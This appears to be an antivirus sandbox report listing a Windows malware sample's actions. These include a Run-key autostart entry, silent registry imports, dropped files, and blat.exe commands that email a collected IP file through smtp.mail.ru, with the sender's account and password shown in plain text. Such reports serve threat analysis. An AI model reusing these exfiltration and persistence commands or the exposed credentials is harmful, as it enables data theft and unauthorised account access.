Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '111' = '%WINDIR%\bat.exe'
- '%TEMP%\1.tmp\blat.exe' 04/22/2014_Know_IP.txt -to protected_by@mail.ru
- '%TEMP%\1.tmp\blat.exe' -install -server smtp.mail.ru -port 587 -f ip_for_tests@mail.ru -u ip_for_tests@mail.ru -pw 852456protected
- '%WINDIR%\regedit.exe' /s %WINDIR%\features.reg
- '%WINDIR%\regedit.exe' /s %WINDIR%\Product.reg
- '%WINDIR%\regedit.exe' /s %WINDIR%\ff.reg
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\bat.cmd" "
- '<SYSTEM32>\ping.exe' localhost -n 5
- %WINDIR%\bat.exe
- %TEMP%\1.tmp\bat.exe
- %TEMP%\1.tmp\realip.exe
- %WINDIR%\Product.reg
- %WINDIR%\features.reg
- %WINDIR%\ff.reg
- %TEMP%\1.tmp\Product.reg
- %TEMP%\1.tmp\blat.exe
- %TEMP%\1.tmp\blat.dll
- %TEMP%\1.tmp\bat.cmd
- %TEMP%\1.tmp\ff.reg
- %TEMP%\1.tmp\features.reg
- %TEMP%\1.tmp\blat.lib
- %TEMP%\1.tmp\realip.exe
- %TEMP%\1.tmp\Product.reg
- %TEMP%\1.tmp\bat.cmd
- %TEMP%\1.tmp\bat.exe
- %TEMP%\1.tmp\ff.reg
- %TEMP%\1.tmp\blat.exe
- %TEMP%\1.tmp\blat.dll
- %TEMP%\1.tmp\features.reg
- %TEMP%\1.tmp\blat.lib
- ClassName: 'Indicator' WindowName: '(null)'
- ClassName: 'RegEdit_RegEdit' WindowName: '(null)'